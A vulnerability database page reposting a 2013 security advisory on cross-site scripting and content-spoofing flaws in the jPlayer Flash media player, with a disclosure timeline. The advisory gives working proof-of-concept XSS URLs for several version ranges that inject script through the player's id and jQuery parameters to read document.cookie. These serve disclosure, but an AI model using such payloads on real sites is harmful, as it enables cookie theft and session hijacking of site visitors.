Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

jPlayer 2.2.22 XSS / Content Spoofing

🗓️ 21 Apr 2013 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 118 Views

jPlayer 2.2.22 XSS and Content Spoofing vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2013-1942
29 Mar 201300:00
circl
CVE		CVE-2013-1942
15 Aug 201317:00
cve
Cvelist		CVE-2013-1942
15 Aug 201317:00
cvelist
Debian CVE		CVE-2013-1942
15 Aug 201317:00
debiancve
EUVD		EUVD-2013-1934
7 Oct 202500:30
euvd
NVD		CVE-2013-1942
15 Aug 201317:55
nvd
OwnCloud		Server: XSS Vulnerability in jPlayer
11 Apr 201311:42
owncloud
OwnCloud		XSS Vulnerability in jPlayer - ownCloud
11 Apr 201317:49
owncloud
OpenVAS		ownCloud Multiple Vulnerabilities (oC-SA-2013-014, oC-SA-2013-015)
3 Jul 201400:00
openvas
OSV		UBUNTU-CVE-2013-1942
15 Aug 201317:55
osv
Rows per page
`Hello list!  
  
I want to inform you about multiple vulnerabilities in jPlayer. These are   
Cross-Site Scripting and Content Spoofing and vulnerabilities in jPlayer.   
Which is used at tens thousands of web sites and in multiple web   
applications.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are versions before jPlayer 2.2.23. Version 2.2.23 and the last   
released version 2.3.0 are not vulnerable to mentioned XSS, except CS via JS   
and XSS via JS callbacks. Also there are other bypass methods which work in   
version 2.3.0, but the developers haven't fixed them besides attack via   
alert. About that I've wrote to developers already in March and reminded   
again. So wait for new version with fixing of these vulnerabilities.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Happyworm  
http://www.jplayer.org  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
In different versions of jPlayer there are different XSS vulnerabilities.  
  
0.2.1 - 1.2.0:  
  
http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
2.0.0:  
  
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
2.1.0:  
  
http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
In version 2.2.0 these XSS vulnerabilities were fixed (the developers was   
informed about hole in jQuery parameter and made a fix, which protected from   
both attacks). But Malte Batram (in version 2.2.19) and I (in version   
2.2.20) have found new ones.  
  
2.2.0 - 2.2.19 (and previous versions):  
  
Attack works in Firefox (all versions and browsers on Gecko engine), IE6 and   
Opera 10.62.  
  
http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E  
  
2.2.20 - 2.2.22 (and previous versions):  
  
http:/site/Jplayer.swf?jQuery=alert&id=XSS  
  
Content Spoofing (WASC-12):  
  
It's possible to conduct CS (inclusion of audio/video files from external   
resources) via JS and XSS via JS callbacks. This requires HTML Injection   
vulnerability at the site. The attack is similar to XSS attacks via   
callbacks in JW Player (http://securityvulns.ru/docs28176.html).  
  
Because this attack vector requires separate vulnerability at target site to   
conduct CS and XSS attacks with using of jPlayer, the developers didn't do   
anything to fix it. The same as developers JW Player. So protection from   
this attack scenario lies solely on web sites owners.  
  
------------  
Timeline:  
------------   
  
2013.01.31 - found vulnerabilities in jPlayer at multiple web sites (in   
version 2.1.0).  
2013.03.14 - announced at my site.  
2013.03.19 - informed developers.  
2013.03.19-30 - discussed with developers different vulnerabilities in   
different versions of jPlayer and at their sites.  
2013.03.21 - developers was informed by Malte Batram's about XSS hole in   
2.2.19.  
2013.03.21 - developers fixed Malte's XSS hole in 2.2.20 in github   
(CVE-2013-1942).  
2013.03.22 - informed developers about new hole, which works in 2.2.20.  
2013.03.23 - sent details of new XSS and warned about possibility for other   
XSS attacks and gave recommendations about proper fixing of XSS to prevent   
any future XSS.  
2013.03.30 - reminded developers about last hole.  
2013.04.12 - developers fixed my XSS hole in 2.2.23 in github.  
2013.04.20 - developers released jPlayer 2.3.0   
(http://www.jplayer.org/2.3.0/release-notes/) and informed me.  
2013.04.20 - disclosed at my site about jPlayer   
(http://websecurity.com.ua/6379/).  
2013.04.21 - tested version 2.3.0 and found that developers fixed only one   
attack vector and didn't make complete fix, as I recommended in March, so I   
reminded them and sent them examples of two new XSS.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Apr 2013 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.08796
jplayersecurity vulnerabilitiesxsscontent spoofingweb applicationscve-2013-1942
118